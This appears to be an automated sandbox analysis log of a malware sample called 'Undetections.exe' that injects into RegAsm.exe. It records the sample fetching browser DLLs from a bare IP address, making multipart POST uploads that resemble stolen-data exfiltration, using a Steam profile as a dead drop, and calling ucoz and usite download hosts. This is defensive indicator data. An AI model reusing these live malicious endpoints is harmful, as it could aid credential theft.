                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 127537Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.212.139
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404420 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00404420
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: universalbeure.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/hwids.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildLink.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /spoofer.zip HTTP/1.1Host: ashjghas.ucoz.netConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199662282318 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CLIENT_VERSIONthttp://gdata.youtube.com/feeds/api/videos/{0}?v=2&alt=jsonDFailed to get youtube video data: Lhttp://vimeo.com/api/v2/video/{0}.json@Failed to get vimeo video data: ork Manager.<br><br> <b>LICENSE MODULE</b><br> The license module enables you to work without interruptions. Issues with the module can be caused by:<br><br> (i) <i>Framework Manager is not installed</i><br>(ii) <i>HDD formatting</i><br>(iii) <i>OS reintallation</i>,<br>(iv) <i>Siticone Files Deletion</i>, or<br>(v) <i>Any other issues</i>.<br><br> For assistance, please contact our support centre at: <i>support@siticoneframework.com</i>PMissing Manager or the Module is corrupt4Download Framework Manager4Contact Our Support CentreHmailto:support@siticoneframework.comDhttps://www.siticoneframework.com/ equals www.youtube.com (Youtube)
                          Source: unknownDNS traffic detected: queries for: universalbeure.usite.pro
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ashjghas.ucoz.net
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ashjghas.ucoz.netd
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: Undetections.exe, 00000000.00000002.4309060736.00000000103F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/X
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/Xd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-brands-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-brands-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-brands-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-brands-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-regular-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-regular-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-solid-900.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/fonts/fa-solid-900.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-brands-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-brands-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-regular-400.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-regular-400.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-solid-900.ttf
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/fonts/fa-solid-900.ttfd
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gdata.youtube.com/feeds/api/videos/
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.awesome.incremented/wpf/xaml/fontawesome.sharp
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://universalbeure.usite.pro
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://universalbeure.usite.prod
